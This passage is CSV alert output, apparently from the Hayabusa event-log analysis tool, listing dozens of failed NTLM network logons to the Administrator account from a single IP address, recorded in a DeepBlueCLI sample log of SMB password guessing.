2016-09-20 01:51:32.408 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: q9DyH9oxFbRTCQ80 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:32.458 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5LZo1ljGLOVKhwcC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:32.556 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GvY6Q7RGKwjehARC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:32.600 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uKLrHVMevqniTck8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:32.645 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ldxglvKFhLJQ3FV3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:32.685 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lRHIAxIj9wFRIg67 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:32.725 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Mc7nvfyDfWpnhhBx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:32.768 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NB7Y4gPbxose5TsQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:32.806 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yKFU6DJ8Wdtp2qdC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:32.841 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YlbxRctdClWIOjss | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:32.886 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LToi5ANf3tUteu4h | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:32.932 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 52YPmYviVPBqJ39Y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:32.985 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JpzKsyxEKNLd8l1u | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:33.037 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: r0vd6xEFevamX3jF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:33.089 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WR9gJBoN1ra4NI2M | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:33.136 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rGYNVrDBIpMBu9GT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:33.186 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 57qCysbeaXx12CbY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:33.229 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xyJl4mHvgtTv53d9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:33.275 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jGBDZCtot2ogcKIO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:33.305 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bBhmbqZIi1gX62mM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:33.348 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: o7d4bcBJV1jlRgdt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:33.397 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FtfFb6hMHJiFXxai | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:33.441 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: frlsZMDcdb5WaW99 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:33.484 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CFV8UiUTRCCfab9l | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:33.537 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZI8P6ZeVRmQlbGtz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:33.572 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UmJI7S1nj5hfWZqv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:33.624 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: veh8XInSzXe8E9UD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:33.669 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: a1BuBHLILZ4afwJC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:33.721 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NN2h7CHnGSCQZXan | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:33.758 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BU3fxfM1qGBJ55HS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:33.802 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q1OlBmhUABabDQbN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:33.848 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6DgQtHG7cT05kRXd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:33.890 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EUTe3JqVWgDcDcOS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:33.933 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nGKgUOyX3USQlESB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:33.978 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rcIJ8keQvgax1SuL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:34.025 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: A7jsyA7bWtVf4sLr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:34.065 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mijnM28fwbgWzkvp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:34.115 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: o6dNmJo7vkacqxA6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:34.155 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FxvD2OWtadDT1Q2c | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:34.185 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WK8Esc50KVWIsLU5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:34.244 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: U07NeCzXSdx5Nlgs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:34.292 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tObVl72GJse2HCGp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:34.335 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nbEnp2E5a3N78OBC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:34.389 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IlRmyinJLWwj5yQg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:34.438 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 92H7tdXinUOxtOLV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:34.493 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Za42EUNuitIXaMBo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:34.547 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kz7OtswOreS0fdeS | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:34.608 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VMxY1IHx5VuvskM7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:34.667 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: d6uxMqLCcqHkuesV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:34.721 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TmeAWYvFEbqJp1rt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:34.826 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8tGAdT1CBRYRatVA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:34.925 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: K0h9ulMPWtj8bEKI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:35.052 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eLyLMNv6cOp3sgrq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:35.098 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KIAOs16X8nFxV45x | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:35.150 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Z4EbyEaUxUEyuiY6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:35.200 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SDnW5GABBLbe6eZ7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:35.258 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GublgQLD3RXQNmkX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:35.301 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2BQRppHTUHAoWPe4 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:35.352 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gnh6HFlIW1zWEBu5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:35.402 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ulbcy5PWLYUm5Sy0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:35.449 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: L8rkZ7iBMam5o8VJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:35.493 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n39Zox0PFeNirzyT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:35.543 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3u3YUCKxEo5pnKJX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:35.589 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wen3pHM88kSRkHNf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:35.625 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dGDHJ4KMm2zEMV0b | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:35.673 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lKZAB1nfXPYSLxsE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:35.724 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tYkOsX0XDpkdvp01 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:35.779 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: r9y7HjOeGPcrdj1c | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:35.823 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RLwh8Lg3nvbm8Q2p | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:35.874 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QoMkBcp8ouIgpX4m | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:35.918 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2UnrDiOAOec5DQGQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:35.976 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UxJGLShj5EDKLSDZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:36.033 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iWhaz8W0VLQdXKWN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:36.081 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 82YDxSIBnCAqdK4c | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:36.124 
